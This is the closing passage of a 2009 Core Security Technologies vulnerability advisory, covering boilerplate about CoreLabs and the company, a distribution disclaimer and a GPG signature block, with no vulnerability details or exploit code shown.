http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q
PMPteYbShbRU4j4tIk93HPM=
=Mx5G
-----END PGP SIGNATURE-----
# milw0rm.com [2009-06-10]